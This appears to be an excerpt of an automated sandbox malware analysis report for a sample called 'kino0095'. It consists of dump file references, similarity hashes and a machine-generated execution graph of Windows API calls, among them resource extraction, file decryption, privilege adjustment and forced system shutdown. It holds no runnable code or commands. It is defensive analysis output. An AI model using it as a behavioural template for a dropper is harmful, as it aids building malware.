                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1632413811-0
                                                                                                                                                                                                                                    • Opcode ID: 1ac10c74a99a4606ffbc2ced5b9081cb86f07f624a496a2c53f0320d00224a4f
                                                                                                                                                                                                                                    • Instruction ID: 35d7177b4e10ec3674c1ee704309aa3924d0a09f1180a43db0e9d71f2f729be1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ac10c74a99a4606ffbc2ced5b9081cb86f07f624a496a2c53f0320d00224a4f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7BF09874615316DFDB79AF38E5D96D43BA9FB54321B10861AE4E1862E8CF3F85408B10
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                    Execution Coverage:26.9%
                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                    Total number of Nodes:965
                                                                                                                                                                                                                                    Total number of Limit Nodes:41
                                                                                                                                                                                                                                    execution_graph 2196 964cd0 2197 964cf4 2196->2197 2198 964d0b 2196->2198 2199 964d02 2197->2199 2200 964b60 FindCloseChangeNotification 2197->2200 2198->2199 2202 964dcb 2198->2202 2205 964d25 2198->2205 2253 966ce0 2199->2253 2200->2199 2203 964dd4 SetDlgItemTextA 2202->2203 2206 964de3 2202->2206 2203->2206 2204 964e95 2205->2199 2219 964c37 2205->2219 2206->2199 2227 96476d 2206->2227 2210 964e38 2210->2199 2236 964980 2210->2236 2215 964e64 2244 9647e0 LocalAlloc 2215->2244 2218 964e6f 2218->2199 2220 964c4c DosDateTimeToFileTime 2219->2220 2221 964c88 2219->2221 2220->2221 2222 964c5e LocalFileTimeToFileTime 2220->2222 2221->2199 2224 964b60 2221->2224 2222->2221 2223 964c70 SetFileTime 2222->2223 2223->2221 2225 964b76 SetFileAttributesA 2224->2225 2226 964b92 FindCloseChangeNotification 2224->2226 2225->2199 2226->2225 2258 9666ae GetFileAttributesA 2227->2258 2229 96477b 2229->2210 2230 9647cc SetFileAttributesA 2232 9647db 2230->2232 2232->2210 2235 9647c2 2235->2230 2237 964990 2236->2237 2238 9649a5 2237->2238 2239 9649c2 lstrcmpA 2237->2239 2240 9644b9 20 API calls 2238->2240 2241 9649ba 2239->2241 2242 964a0e 2239->2242 2240->2241 2241->2199 2241->2215 2242->2241 2323 96487a 2242->2323 2245 9647f6 2244->2245 2246 96480f LocalAlloc 2244->2246 2247 9644b9 20 API calls 2245->2247 2249 96480b 2246->2249 2250 964831 2246->2250 2247->2249 2249->2218 2251 9644b9 20 API calls 2250->2251 2252 964846 LocalFree 2251->2252 2252->2249 2254 966ceb 2253->2254 2255 966ce8 2253->2255 2336 966cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2254->2336 2255->2204 2257 966e26 2257->2204 2259 964777 2258->2259 2259->2229 2259->2230 2260 966517 FindResourceA 2259->2260 2261 966536 LoadResource 2260->2261 2262 96656b 2260->2262 2261->2262 2263 966544 DialogBoxIndirectParamA FreeResource 2261->2263 2267 9644b9 2262->2267 2263->2262 2265 9647b1 2263->2265 2265->2230 2265->2232 2265->2235 2268 9644fe LoadStringA 2267->2268 2269 96455a 2267->2269 2270 964527 2268->2270 2271 964562 2268->2271 2272 966ce0 4 API calls 2269->2272 2296 96681f 2270->2296 2276 9645c9 2271->2276 2282 96457e LocalAlloc 2271->2282 2274 964689 2272->2274 2274->2265 2278 964607 LocalAlloc 2276->2278 2279 9645cd LocalAlloc 2276->2279 2277 964536 MessageBoxA 2277->2269 2278->2269 2290 9645c4 2278->2290 2279->2269 2284 9645f3 2279->2284 2282->2269 2289 9645af 2282->2289 2287 96171e _vsnprintf 2284->2287 2285 96462d MessageBeep 2288 96681f 10 API calls 2285->2288 2287->2290 2291 96463b 2288->2291 2313 96171e 2289->2313 2290->2285 2293 964645 MessageBoxA LocalFree 2291->2293 2295 9667c9 EnumResourceLanguagesA 2291->2295 2293->2269 2295->2293 2297 966857 GetVersionExA 2296->2297 2306 96691a 2296->2306 2299 96687c 2297->2299 2297->2306 2298 966ce0 4 API calls 2300 96452c 2298->2300 2301 9668a5 GetSystemMetrics 2299->2301 2299->2306 2300->2277 2307 9667c9 2300->2307 2302 9668b5 RegOpenKeyExA 2301->2302 2301->2306 2303 9668d6 RegQueryValueExA RegCloseKey 2302->2303 2302->2306 2304 96690c 2303->2304 2303->2306 2317 9666f9 2304->2317 2306->2298 2308 966803 2307->2308 2309 9667e2 2307->2309 2308->2277 2321 966793 EnumResourceLanguagesA 2309->2321 2311 9667f5 2311->2308 2322 966793 EnumResourceLanguagesA 2311->2322 2314 96172d 2313->2314 2315 96173d _vsnprintf 2314->2315 2316 96175d 2314->2316 2315->2316 2316->2290 2318 96670f 2317->2318 2319 966740 CharNextA 2318->2319 2320 96674b 2318->2320 2319->2318 2320->2306 2321->2311 2322->2308 2324 9648a2 CreateFileA 2323->2324 2326 964908 2324->2326 2327 9648e9 2324->2327 2326->2241 2327->2326 2328 9648ee 2327->2328 2331 96490c 2328->2331 2332 9648f5 CreateFileA 2331->2332 2333 964917 2331->2333 2332->2326 2333->2332 2334 964962 CharNextA 2333->2334 2335 964953 CreateDirectoryA 2333->2335 2334->2333 2335->2334 2336->2257 2337 964ad0 2345 963680 2337->2345 2340 964aee WriteFile 2342 964b14 2340->2342 2343 964b0f 2340->2343 2341 964ae9 2342->2343 2344 964b3b SendDlgItemMessageA 2342->2344 2344->2343 2346 963691 MsgWaitForMultipleObjects 2345->2346 2347 9636e8 2346->2347 2348 9636a9 PeekMessageA 2346->2348 2347->2340 2347->2341 2348->2346 2349 9636bc 2348->2349 2349->2346 2349->2347 2350 9636c7 DispatchMessageA 2349->2350 2351 9636d1 PeekMessageA 2349->2351 2350->2351 2351->2349 3128 963210 3129 963227 3128->3129 3130 96328e EndDialog 3128->3130 3131 963235 3129->3131 3132 9633e2 GetDesktopWindow 3129->3132 3146 963239 3130->3146 3136 96324c 3131->3136 3137 9632dd GetDlgItemTextA 3131->3137 3131->3146 3181 9643d0 6 API calls 3132->3181 3140 9632c5 EndDialog 3136->3140 3141 963251 3136->3141 3139 963366 3137->3139 3147 9632fc 3137->3147 3138 96341f GetDlgItem EnableWindow 3138->3146 3143 9644b9 20 API calls 3139->3143 3140->3146 3142 96325c LoadStringA 3141->3142 3141->3146 3144 963294 3142->3144 3145 96327b 3142->3145 3143->3146 3166 964224 LoadLibraryA 3144->3166 3150 9644b9 20 API calls 3145->3150 3147->3139 3149 963331 GetFileAttributesA 3147->3149 3152 96333f 3149->3152 3153 96337c 3149->3153 3150->3130 3156 9644b9 20 API calls 3152->3156 3155 96658a CharPrevA 3153->3155 3154 9632a5 SetDlgItemTextA 3154->3145 3154->3146 3157 96338d 3155->3157 3158 963351 3156->3158 3159 9658c8 27 API calls 3157->3159 3158->3146 3160 96335a CreateDirectoryA 3158->3160 3161 963394 3159->3161 3160->3139 3160->3153 3161->3139 3162 9633a4 3161->3162 3163 9633c7 EndDialog 3162->3163 3164 96597d 34 API calls 3162->3164 3163->3146 3165 9633c3 3164->3165 3165->3146 3165->3163 3167 964246 GetProcAddress 3166->3167 3168 9643b2 3166->3168 3169 9643a4 FreeLibrary 3167->3169 3170 96425d GetProcAddress 3167->3170 3172 9644b9 20 API calls 3168->3172 3169->3168 3170->3169 3171 964274 GetProcAddress 3170->3171 3171->3169 3173 96428b 3171->3173 3174 96329d 3172->3174 3175 964295 GetTempPathA 3173->3175 3180 9642e1 3173->3180 3174->3146 3174->3154 3176 9642ad 3175->3176 3176->3176 3177 9642b4 CharPrevA 3176->3177 3178 9642d0 CharPrevA 3177->3178 3177->3180 3178->3180 3179 964390 FreeLibrary 3179->3174 3180->3179 3183 964463 SetWindowPos 3181->3183 3184 966ce0 4 API calls 3183->3184 3185 9633f1 SetWindowTextA SendDlgItemMessageA 3184->3185 3185->3138 3185->3146 3186 964a50 3187 964a66 3186->3187 3188 964a9f ReadFile 3186->3188 3189 964a82 memcpy 3187->3189 3190 964abb 3187->3190 3188->3190 3189->3190 3191 963450 3192 9634d3 EndDialog 3191->3192 3193 96345e 3191->3193 3194 96346a 3192->3194 3195 96349a GetDesktopWindow 3193->3195 3199 963465 3193->3199 3196 9643d0 11 API calls 3195->3196 3197 9634ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3196->3197 3197->3194 3198 96348c EndDialog 3198->3194 3199->3194 3199->3198 3200 966c03 3201 966c17 _exit 3200->3201 3202 966c1e 3200->3202 3201->3202 3203 966c27 _cexit 3202->3203 3204 966c32 3202->3204 3203->3204 2352 964cc0 GlobalFree 2353 966f40 SetUnhandledExceptionFilter 3205 964bc0 3207 964c05 3205->3207 3208 964bd7 3205->3208 3206 964c1b SetFilePointer 3206->3208 3207->3206 3207->3208 3209 9630c0 3210 9630de CallWindowProcA 3209->3210 3211 9630ce 3209->3211 3212 9630da 3210->3212 3211->3210 3211->3212 3213 9663c0 3214 966407 3213->3214 3215 96658a CharPrevA 3214->3215 3216 966415 CreateFileA 3215->3216 3217 96643a 3216->3217 3218 966448 WriteFile 3216->3218 3221 966ce0 4 API calls 3217->3221 3219 966465 CloseHandle 3218->3219 3219->3217 3222 96648f 3221->3222 3223 963100 3224 9631b0 3223->3224 3225 963111 3223->3225 3226 963141 3224->3226 3227 9631b9 SendDlgItemMessageA 3224->3227 3228 96311d 3225->3228 3229 963149 GetDesktopWindow 3225->3229 3227->3226 3228->3226 3230 963138 EndDialog 3228->3230 3231 9643d0 11 API calls 3229->3231 3230->3226 3232 96315d 6 API calls 3231->3232 3232->3226 3233 964200 3234 96421e 3233->3234 3235 96420b SendMessageA 3233->3235 3235->3234 3236 9669b0 3237 9669b5 3236->3237 3245 966fbe GetModuleHandleW 3237->3245 3239 9669c1 __set_app_type __p__fmode __p__commode 3240 9669f9 3239->3240 3241 966a02 __setusermatherr 3240->3241 3242 966a0e 3240->3242 3241->3242 3247 9671ef _controlfp 3242->3247 3244 966a13 3246 966fcf 3245->3246 3246->3239 3247->3244 3248 9634f0 3249 963504 3248->3249 3250 9635b8 3248->3250 3249->3250 3251 9635be GetDesktopWindow 3249->3251 3252 96351b 3249->3252 3253 963526 3250->3253 3254 963671 EndDialog 3250->3254 3255 9643d0 11 API calls 3251->3255 3256 96354f 3252->3256 3257 96351f 3252->3257 3254->3253 3258 9635d6 3255->3258 3256->3253 3260 963559 ResetEvent 3256->3260 3257->3253 3259 96352d TerminateThread EndDialog 3257->3259 3261 9635e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3258->3261 3262 96361d SetWindowTextA CreateThread 3258->3262 3259->3253 3263 9644b9 20 API calls 3260->3263 3261->3262 3262->3253 3264 963646 3262->3264 3265 963581 3263->3265 3266 9644b9 20 API calls 3264->3266 3267 96359b SetEvent 3265->3267 3269 96358a SetEvent 3265->3269 3266->3250 3268 963680 4 API calls 3267->3268 3268->3250 3269->3253 3270 966ef0 3271 966f2d 3270->3271 3272 966f02 3270->3272 3272->3271 3273 966f27 ?terminate@ 3272->3273 3273->3271 3274 967270 _except_handler4_common 2354 964ca0 GlobalAlloc 2355 966a60 2372 967155 2355->2372 2357 966a65 2358 966a76 GetStartupInfoW 2357->2358 2359 966a93 2358->2359 2360 966aa8 2359->2360 2361 966aaf Sleep 2359->2361 2362 966ac7 _amsg_exit 2360->2362 2364 966ad1 2360->2364 2361->2359 2362->2364 2363 966b13 _initterm 2368 966b2e __IsNonwritableInCurrentImage 2363->2368 2364->2363 2365 966af4 2364->2365 2364->2368 2366 966bd6 _ismbblead 2366->2368 2367 966c1e 2367->2365 2370 966c27 _cexit 2367->2370 2368->2366 2368->2367 2371 966bbe exit 2368->2371 2377 962bfb GetVersion 2368->2377 2370->2365 2371->2368 2373 96717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2372->2373 2374 96717a 2372->2374 2376 9671cd 2373->2376 2374->2373 2375 9671e2 2374->2375 2375->2357 2376->2375 2378 962c50 2377->2378 2379 962c0f 2377->2379 2394 962caa memset memset memset 2378->2394 2379->2378 2380 962c13 GetModuleHandleW 2379->2380 2380->2378 2383 962c22 GetProcAddress 2380->2383 2383->2378 2390 962c34 2383->2390 2384 962c8e 2386 962c97 CloseHandle 2384->2386 2387 962c9e 2384->2387 2386->2387 2387->2368 2390->2378 2392 962c89 2489 961f90 2392->2489 2506 96468f FindResourceA SizeofResource 2394->2506 2397 962d2d CreateEventA SetEvent 2398 96468f 7 API calls 2397->2398 2400 962d57 2398->2400 2399 9644b9 20 API calls 2401 962f06 2399->2401 2402 962d7d 2400->2402 2403 962d5b 2400->2403 2406 966ce0 4 API calls 2401->2406 2405 962e1f 2402->2405 2409 96468f 7 API calls 2402->2409 2404 9644b9 20 API calls 2403->2404 2407 962d6e 2404->2407 2511 965c9e 2405->2511 2410 962c62 2406->2410 2407->2401 2412 962d9f 2409->2412 2410->2384 2435 962f1d 2410->2435 2412->2403 2415 962da3 CreateMutexA 2412->2415 2413 962e30 2413->2399 2414 962e3a 2416 962e52 FindResourceA 2414->2416 2417 962e43 2414->2417 2415->2405 2418 962dbd GetLastError 2415->2418 2421 962e64 LoadResource 2416->2421 2422 962e6e 2416->2422 2537 962390 2417->2537 2418->2405 2420 962dca 2418->2420 2423 962dd5 2420->2423 2424 962dea 2420->2424 2421->2422 2422->2407 2552 9636ee GetVersionExA 2422->2552 2426 9644b9 20 API calls 2423->2426 2425 9644b9 20 API calls 2424->2425 2427 962dff 2425->2427 2429 962de8 2426->2429 2427->2405 2430 962e04 CloseHandle 2427->2430 2429->2430 2430->2401 2434 966517 24 API calls 2434->2407 2436 962f3f 2435->2436 2437 962f6c 2435->2437 2438 962f5f 2436->2438 2641 9651e5 2436->2641 2661 965164 2437->2661 2794 963a3f 2438->2794 2442 962f71 2472 963041 2442->2472 2676 9655a0 2442->2676 2447 966ce0 4 API calls 2449 962c6b 2447->2449 2448 962f86 GetSystemDirectoryA 2450 96658a CharPrevA 2448->2450 2476 9652b6 2449->2476 2451 962fab LoadLibraryA 2450->2451 2452 962ff7 FreeLibrary 2451->2452 2453 962fc0 GetProcAddress 2451->2453 2455 963006 2452->2455 2456 963017 SetCurrentDirectoryA 2452->2456 2453->2452 2454 962fd6 DecryptFileA 2453->2454 2454->2452 2464 962ff0 2454->2464 2455->2456 2726 96621e GetWindowsDirectoryA 2455->2726 2457 963026 2456->2457 2461 963054 2456->2461 2458 9644b9 20 API calls 2457->2458 2463 963037 2458->2463 2460 963061 2466 96307a 2460->2466 2460->2472 2746 96256d 2460->2746 2461->2460 2737 963b26 2461->2737 2813 966285 GetLastError 2463->2813 2464->2452 2469 963098 2466->2469 2757 963ba2 2466->2757 2469->2472 2474 9630af 2469->2474 2472->2447 2815 964169 2474->2815 2477 9652d6 2476->2477 2478 965316 2476->2478 2479 965300 LocalFree LocalFree 2477->2479 2481 9652eb SetFileAttributesA DeleteFileA 2477->2481 2482 965374 2478->2482 2486 96535e SetCurrentDirectoryA 2478->2486 2488 9665e8 4 API calls 2478->2488 2479->2477 2479->2478 2480 96538c 2483 966ce0 4 API calls 2480->2483 2481->2479 2482->2480 3124 961fe1 2482->3124 2485 962c72 2483->2485 2485->2384 2485->2392 2487 962390 13 API calls 2486->2487 2487->2482 2488->2486 2490 961f9f 2489->2490 2491 961f9a 2489->2491 2493 961fc0 2490->2493 2496 9644b9 20 API calls 2490->2496 2497 961fd9 2490->2497 2492 961ea7 15 API calls 2491->2492 2492->2490 2494 961fcf ExitWindowsEx 2493->2494 2495 961ee2 GetCurrentProcess OpenProcessToken 2493->2495 2493->2497 2494->2497 2499 961f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2495->2499 2500 961f0e 2495->2500 2496->2493 2497->2384 2499->2500 2501 961f6b ExitWindowsEx 2499->2501 2503 9644b9 20 API calls 2500->2503 2501->2500 2502 961f1f 2501->2502 2504 966ce0 4 API calls 2502->2504 2503->2502 2505 961f8c 2504->2505 2505->2384 2507 9646b6 2506->2507 2509 962d1a 2506->2509 2508 9646be FindResourceA LoadResource LockResource 2507->2508 2507->2509 2508->2509 2510 9646df memcpy_s FreeResource 2508->2510 2509->2397 2509->2413 2510->2509 2517 965e17 2511->2517 2535 965cc3 2511->2535 2512 965dd0 2516 965dec GetModuleFileNameA 2512->2516 2512->2517 2513 966ce0 4 API calls 2515 962e2c 2513->2515 2514 965ced CharNextA 2514->2535 2515->2413 2515->2414 2516->2517 2518 965e0a 2516->2518 2517->2513 2587 9666c8 2518->2587 2520 966218 2596 966e2a 2520->2596 2523 965e36 CharUpperA 2524 9661d0 2523->2524 2523->2535 2525 9644b9 20 API calls 2524->2525 2526 9661e7 2525->2526 2527 9661f7 ExitProcess 2526->2527 2528 9661f0 CloseHandle 2526->2528 2528->2527 2529 965f9f CharUpperA 2529->2535 2530 965f59 CompareStringA 2530->2535 2531 966003 CharUpperA 2531->2535 2532 96667f IsDBCSLeadByte CharNextA 2532->2535 2533 965edc CharUpperA 2533->2535 2534 9660a2 CharUpperA 2534->2535 2535->2512 2535->2514 2535->2517 2535->2520 2535->2523 2535->2529 2535->2530 2535->2531 2535->2532 2535->2533 2535->2534 2592 96658a 2535->2592 2538 9624cb 2537->2538 2541 9623b9 2537->2541 2539 966ce0 4 API calls 2538->2539 2540 9624dc 2539->2540 2540->2407 2541->2538 2542 9623e9 FindFirstFileA 2541->2542 2542->2538 2543 962407 2542->2543 2544 962421 lstrcmpA 2543->2544 2545 962479 2543->2545 2547 9624a9 FindNextFileA 2543->2547 2550 96658a CharPrevA 2543->2550 2551 962390 5 API calls 2543->2551 2546 962431 lstrcmpA 2544->2546 2544->2547 2548 962488 SetFileAttributesA DeleteFileA 2545->2548 2546->2543 2546->2547 2547->2543 2549 9624bd FindClose RemoveDirectoryA 2547->2549 2548->2547 2549->2538 2550->2543 2551->2543 2557 963737 2552->2557 2559 96372d 2552->2559 2553 9644b9 20 API calls 2554 9639fc 2553->2554 2555 966ce0 4 API calls 2554->2555 2556 962e92 2555->2556 2556->2401 2556->2407 2567 9618a3 2556->2567 2557->2554 2557->2559 2560 9638a4 2557->2560 2603 9628e8 2557->2603 2559->2553 2559->2554 2560->2554 2560->2559 2561 9639c1 MessageBeep 2560->2561 2562 96681f 10 API calls 2561->2562 2563 9639ce 2562->2563 2564 9639d8 MessageBoxA 2563->2564 2565 9667c9 EnumResourceLanguagesA 2563->2565 2564->2554 2565->2564 2568 9618d5 2567->2568 2574 9619b8 2567->2574 2632 9617ee LoadLibraryA 2568->2632 2569 966ce0 4 API calls 2572 9619d5 2569->2572 2572->2407 2572->2434 2573 9618e5 GetCurrentProcess OpenProcessToken 2573->2574 2575 961900 GetTokenInformation 2573->2575 2574->2569 2576 9619aa CloseHandle 2575->2576 2577 961918 GetLastError 2575->2577 2576->2574 2577->2576 2578 961927 LocalAlloc 2577->2578 2579 961938 GetTokenInformation 2578->2579 2580 9619a9 2578->2580 2581 9619a2 LocalFree 2579->2581 2582 96194e AllocateAndInitializeSid 2579->2582 2580->2576 2581->2580 2582->2581 2583 96196e 2582->2583 2584 961999 FreeSid 2583->2584 2585 961975 EqualSid 2583->2585 2586 96198c 2583->2586 2584->2581 2585->2583 2585->2586 2586->2584 2588 9666d5 2587->2588 2589 9666f3 2588->2589 2591 9666e5 CharNextA 2588->2591 2599 966648 2588->2599 2589->2517 2591->2588 2593 96659b 2592->2593 2593->2593 2594 9665b8 CharPrevA 2593->2594 2595 9665ab 2593->2595 2594->2595 2595->2535 2602 966cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 96621d 2600 966668 2599->2600 2601 96665d IsDBCSLeadByte 2599->2601 2600->2588 2601->2600 2602->2598 2604 962a62 2603->2604 2608 96290d 2603->2608 2605 962a75 2604->2605 2606 962a6e GlobalFree 2604->2606 2605->2560 2606->2605 2608->2604 2609 962955 GlobalAlloc 2608->2609 2611 962a20 GlobalUnlock 2608->2611 2612 962a80 GlobalUnlock 2608->2612 2613 962773 2608->2613 2609->2604 2610 962968 GlobalLock 2609->2610 2610->2604 2610->2608 2611->2608 2612->2604 2614 9628b2 2613->2614 2615 9627a3 CharUpperA CharNextA CharNextA 2613->2615 2616 9628b7 GetSystemDirectoryA 2614->2616 2615->2616 2617 9627db 2615->2617 2620 9628bf 2616->2620 2618 9627e3 2617->2618 2619 9628a8 GetWindowsDirectoryA 2617->2619 2624 96658a CharPrevA 2618->2624 2619->2620 2621 9628d2 2620->2621 2622 96658a CharPrevA 2620->2622 2623 966ce0 4 API calls 2621->2623 2622->2621 2625 9628e2 2623->2625 2626 962810 RegOpenKeyExA 2624->2626 2625->2608 2626->2620 2627 962837 RegQueryValueExA 2626->2627 2628 96285c 2627->2628 2629 96289a RegCloseKey 2627->2629 2630 962867 ExpandEnvironmentStringsA 2628->2630 2631 96287a 2628->2631 2629->2620 2630->2631 2631->2629 2633 961826 GetProcAddress 2632->2633 2634 961890 2632->2634 2636 961889 FreeLibrary 2633->2636 2637 961839 AllocateAndInitializeSid 2633->2637 2635 966ce0 4 API calls 2634->2635 2638 96189f 2635->2638 2636->2634 2637->2636 2640 96185f FreeSid 2637->2640 2638->2573 2638->2574 2640->2636 2642 96468f 7 API calls 2641->2642 2643 9651f9 LocalAlloc 2642->2643 2644 96522d 2643->2644 2645 96520d 2643->2645 2647 96468f 7 API calls 2644->2647 2646 9644b9 20 API calls 2645->2646 2649 96521e 2646->2649 2648 96523a 2647->2648 2650 965262 lstrcmpA 2648->2650 2651 96523e 2648->2651 2652 966285 GetLastError 2649->2652 2654 965272 LocalFree 2650->2654 2655 96527e 2650->2655 2653 9644b9 20 API calls 2651->2653 2660 965223 2652->2660 2656 96524f LocalFree 2653->2656 2658 962f4d 2654->2658 2657 9644b9 20 API calls 2655->2657 2656->2658 2659 965290 LocalFree 2657->2659 2658->2437 2658->2438 2658->2472 2659->2660 2660->2658 2662 96468f 7 API calls 2661->2662 2663 965175 2662->2663 2664 96517a 2663->2664 2665 9651af 2663->2665 2667 9644b9 20 API calls 2664->2667 2666 96468f 7 API calls 2665->2666 2668 9651c0 2666->2668 2669 96518d 2667->2669 2828 966298 2668->2828 2669->2442 2673 9651e1 2673->2442 2674 9651ce 2675 9644b9 20 API calls 2674->2675 2675->2669 2677 96468f 7 API calls 2676->2677 2678 9655c7 LocalAlloc 2677->2678 2679 9655fd 2678->2679 2680 9655db 2678->2680 2681 96468f 7 API calls 2679->2681 2682 9644b9 20 API calls 2680->2682 2683 96560a 2681->2683 2684 9655ec 2682->2684 2685 965632 lstrcmpA 2683->2685 2686 96560e 2683->2686 2687 966285 GetLastError 2684->2687 2689 965645 2685->2689 2690 96564b LocalFree 2685->2690 2688 9644b9 20 API calls 2686->2688 2709 9655f1 2687->2709 2691 96561f LocalFree 2688->2691 2689->2690 2692 965696 2690->2692 2693 96565b 2690->2693 2714 9655f6 2691->2714 2694 96589f 2692->2694 2696 9656ae GetTempPathA 2692->2696 2701 965467 49 API calls 2693->2701 2697 966517 24 API calls 2694->2697 2695 966ce0 4 API calls 2698 962f7e 2695->2698 2699 9656eb 2696->2699 2700 9656c3 2696->2700 2697->2714 2698->2448 2698->2472 2707 965717 GetDriveTypeA 2699->2707 2708 96586c GetWindowsDirectoryA 2699->2708 2699->2714 2840 965467 2700->2840 2703 965678 2701->2703 2705 965680 2703->2705 2703->2714 2706 9644b9 20 API calls 2705->2706 2706->2709 2710 965730 GetFileAttributesA 2707->2710 2724 96572b 2707->2724 2874 96597d GetCurrentDirectoryA SetCurrentDirectoryA 2708->2874 2709->2714 2710->2724 2714->2695 2715 965467 49 API calls 2715->2699 2716 962630 21 API calls 2716->2724 2718 9657c1 GetWindowsDirectoryA 2718->2724 2719 96597d 34 API calls 2719->2724 2720 96658a CharPrevA 2721 9657e8 GetFileAttributesA 2720->2721 2722 9657fa CreateDirectoryA 2721->2722 2721->2724 2722->2724 2723 965827 SetFileAttributesA 2723->2724 2724->2707 2724->2708 2724->2710 2724->2714 2724->2716 2724->2718 2724->2719 2724->2720 2724->2723 2725 965467 49 API calls 2724->2725 2870 966952 2724->2870 2725->2724 2727 966268 2726->2727 2728 966249 2726->2728 2729 96597d 34 API calls 2727->2729 2730 9644b9 20 API calls 2728->2730 2731 966277 2729->2731 2732 96625a 2730->2732 2733 966ce0 4 API calls 2731->2733 2734 966285 GetLastError 2732->2734 2735 963013 2733->2735 2736 96625f 2734->2736 2735->2456 2735->2472 2736->2731 2738 963b2d 2737->2738 2738->2738 2739 963b72 2738->2739 2740 963b53 2738->2740 2941 964fe0 2739->2941 2743 966517 24 API calls 2740->2743 2742 963b70 2744 966298 10 API calls 2742->2744 2745 963b7b 2742->2745 2743->2742 2744->2745 2745->2460 2747 962622 2746->2747 2748 962583 2746->2748 2971 9624e0 GetWindowsDirectoryA 2747->2971 2749 96258b 2748->2749 2750 9625e8 RegOpenKeyExA 2748->2750 2752 9625e3 2749->2752 2754 96259b RegOpenKeyExA 2749->2754 2750->2752 2753 962609 RegQueryInfoKeyA 2750->2753 2752->2466 2755 9625d1 RegCloseKey 2753->2755 2754->2752 2756 9625bc RegQueryValueExA 2754->2756 2755->2752 2756->2755 2758 963bdb 2757->2758 2765 963bec 2757->2765 2759 96468f 7 API calls 2758->2759 2759->2765 2760 963c03 memset 2760->2765 2761 963d13 2762 9644b9 20 API calls 2761->2762 2790 963d26 2762->2790 2763 96468f 7 API calls 2763->2765 2765->2760 2765->2761 2765->2763 2768 963fd7 2765->2768 2769 963d7b CompareStringA 2765->2769 2770 963f4d 2765->2770 2772 963fab 2765->2772 2775 963f46 LocalFree 2765->2775 2776 963f1e LocalFree 2765->2776 2780 963cc7 CompareStringA 2765->2780 2791 963e10 2765->2791 2979 961ae8 2765->2979 3019 96202a memset memset RegCreateKeyExA 2765->3019 3045 963fef 2765->3045 2766 966ce0 4 API calls 2767 963f60 2766->2767 2767->2469 2768->2770 3069 962267 2768->3069 2769->2765 2769->2768 2770->2766 2774 9644b9 20 API calls 2772->2774 2778 963fbe LocalFree 2774->2778 2775->2770 2776->2765 2776->2768 2778->2770 2780->2765 2781 963f92 2783 9644b9 20 API calls 2781->2783 2782 963e1f GetProcAddress 2784 963f64 2782->2784 2782->2791 2785 963fa9 2783->2785 2786 9644b9 20 API calls 2784->2786 2787 963f7c LocalFree 2785->2787 2788 963f75 FreeLibrary 2786->2788 2789 966285 GetLastError 2787->2789 2788->2787 2789->2790 2790->2770 2791->2781 2791->2782 2792 963f40 FreeLibrary 2791->2792 2793 963eff FreeLibrary 2791->2793 3059 966495 2791->3059 2792->2775 2793->2776 2795 96468f 7 API calls 2794->2795 2796 963a55 LocalAlloc 2795->2796 2797 963a8e 2796->2797 2798 963a6c 2796->2798 2800 96468f 7 API calls 2797->2800 2799 9644b9 20 API calls 2798->2799 2802 963a7d 2799->2802 2801 963a98 2800->2801 2803 963ac5 lstrcmpA 2801->2803 2804 963a9c 2801->2804 2805 966285 GetLastError 2802->2805 2807 963b0d LocalFree 2803->2807 2808 963ada 2803->2808 2806 9644b9 20 API calls 2804->2806 2811 962f64 2805->2811 2809 963aad LocalFree 2806->2809 2807->2811 2810 966517 24 API calls 2808->2810 2809->2811 2812 963aec LocalFree 2810->2812 2811->2437 2811->2472 2812->2811 2814 96303c 2813->2814 2814->2472 2816 96468f 7 API calls 2815->2816 2817 96417d LocalAlloc 2816->2817 2818 964195 2817->2818 2819 9641a8 2817->2819 2821 9644b9 20 API calls 2818->2821 2820 96468f 7 API calls 2819->2820 2822 9641b5 2820->2822 2823 9641a6 2821->2823 2824 9641c5 lstrcmpA 2822->2824 2825 9641b9 2822->2825 2823->2472 2824->2825 2826 9641e6 LocalFree 2824->2826 2827 9644b9 20 API calls 2825->2827 2826->2823 2827->2826 2829 96171e _vsnprintf 2828->2829 2839 9662c9 FindResourceA 2829->2839 2831 966353 2833 966ce0 4 API calls 2831->2833 2832 9662cb LoadResource LockResource 2832->2831 2835 9662e0 2832->2835 2834 9651ca 2833->2834 2834->2673 2834->2674 2836 966355 FreeResource 2835->2836 2837 96631b FreeResource 2835->2837 2836->2831 2838 96171e _vsnprintf 2837->2838 2838->2839 2839->2831 2839->2832 2841 96548a 2840->2841 2860 96551a 2840->2860 2901 9653a1 2841->2901 2843 965581 2847 966ce0 4 API calls 2843->2847 2846 965495 2846->2843 2850 9654c2 GetSystemInfo 2846->2850 2851 96550c 2846->2851 2852 96559a 2847->2852 2848 96554d 2848->2843 2855 96597d 34 API calls 2848->2855 2849 96553b CreateDirectoryA 2853 965577 2849->2853 